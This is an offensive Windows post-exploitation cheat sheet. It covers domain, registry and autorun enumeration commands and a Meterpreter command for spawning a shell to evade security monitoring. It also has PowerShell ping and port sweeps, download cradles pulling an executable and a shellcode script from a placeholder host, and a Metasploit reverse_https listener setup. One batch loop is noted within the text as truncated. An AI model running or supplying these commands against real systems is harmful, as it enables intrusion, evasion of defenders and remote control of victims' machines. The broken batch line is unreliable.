windows.everything

================================= Manual WIN Enumeration

Pop a shell w/o a banner to bypass most security monitoring tools.

execute -c -H -f cmd -a "/k" -i

============= Basics

net view
net view /domain
net user
net user /domain
net localgroup
net localgroup /domain
net localgroup administrators
net localgroup administrators /domain
net group "Domain Users" /domain
net group "Domain Admins" /domain
net user "SomeUser" /domain

echo %logonserver:*\\=%

============== Environment Stuff
sc query

tasklist /v
tasklist /F /IM "cmd.exe" <<<<<<<< Kill a Process

<<<<<<<<<<<<< List Software Installed
reg query HKLM\Software
reg query HKCU\Software
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion"

fsutil fsinfo drives <<<< List Mounts
reg query HKLM\system\mounteddevices <<<< List Mounts

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" <<< Show Recent Commands
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" <<< Show Recent Commands

<<<<<<<<<<<<<< Find All AutoRun Processes
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run" /S
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\RunOnce" /S
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\RunOnceEx" /S
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\RunServices" /S
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\RunServicesOnce" /S
reg query "HKLM\Software\Policies\Microsoft\Windows\System\Scripts" /S
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Policies\Explorer\Run\" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\RunOnce" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\RunOnceEx" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\RunServices" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\RunServicesOnce" /S
reg query "HKCU\Software\Policies\Microsoft\Windows\System\Scripts" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Policies\Explorer\Run\" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Explorer\RunMRU" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Explorer\RecentDocs" /S
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU" /S

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Uninstall" /S
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\" /S

============== AutoStart Tasks

at
schtasks.exe /Query /FO LIST /V
type "%SystemDrive%\autoexec.bat"
type "%SystemRoot%\system.ini"
type "%SystemRoot%\winstart.bat"
type "%SystemRoot%\wininit.ini"
dir "%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "%SystemRoot%"\Tasks
dir "%UserProfile%\Start Menu\Programs\Startup"
============== Domain Stuff

dsquery user -name *
dsquery user -name * -limit 1000 <<<< Increase limit for our query searches
dsquery group <<<<<<<<<<<< List all Local Groups
dsquery group "<distinguished name>" <<<<<<<<<<<< List all Groups on hostname given
dsquery group -name <group name> | dsget group -members -expand <<<<<<< List all Domain Admin Accounts
dsquery group -name <user name> | dsget user -memberof -expand <<<<< List of a Users other Groups

showgroups domain_name\user_name <<<<<<<< Find out what groups a user is in
showmbrs domain_name\group_name <<<<<<<<<< find all members of a group
dsquery group -name group_name | dsget group -desc <<<< Find out about a group
dsquery user -samid user_name <<<<<<<<<<<<<<<<< Find OU a user account resides on
dsquery computer -name computer_name | dsget computer -memberof <<<< Find OU a computer account resides on
dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=HR))" -limit 0 -attr * <<<<<<<<<<< query a group (ex: HR)

Batch file to Enum Group Members
------------------------------
@echo off
:: Dumps every group returned by dsquery, followed by its members, into membership.txt.
:: NOTE(review): the blog rendering shows typographic quotes (“ ”) around tokens=*;
:: the batch file itself needs plain ASCII double quotes for the FOR /F options.
if exist membership.txt del membership.txt
:: One group distinguished name per line, consumed by the FOR loop below.
dsquery group >groups.txt
::The FOR command is one single line
:: NOTE(review): the trailing "dsget group" call appears truncated in this listing
:: (no group argument, no -members switch, no redirection) — confirm against the original.
for /f “tokens=*” %%g in (groups.txt) do @echo %%g >> membership.txt && echo Members: >>membership.txt && dsget group

=================================== Enumerate with POWERSHELL

Example
powershell -command "& {&'Import-Module' AppLocker}"; "&{&'Set-AppLockerPolicy' -XmlPolicy myXmlFilePath.xml}"

getsystem
shell
cd c:\Users\Administrator.SomePlace

==== Ping Sweep
powershell -command "1..255 | % {\""192.168.0.$($_): $(Test-Connection -count 1 -comp 192.168.0.$($_) -quiet)\""}"

==== Port 445 Sweep
powershell -command "1..255 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.0.$_\"",445)) \"192.168.0.$_\""} 2>$null"

==== Simple Port Scan
powershell -command "1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.0.XX\"",$_)) \""$_ is open\""} 2>$null"

==== Download a File
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://my.website.com/somefile.exe', 'somefile.exe')"

==== Text File to STDOUT local file
(New-Object System.Net.WebClient).DownloadString("http://my.website.com/invoke.shellcode.ps1") | Out-File -Encoding ASCII Invoke

====== Quick MSF Listener to connect back to
msfconsole
use exploit/multi/handler
set ExitOnSession false
set payload windows/meterpreter/reverse_https
set LHOST my.ip.address
set LPORT 443
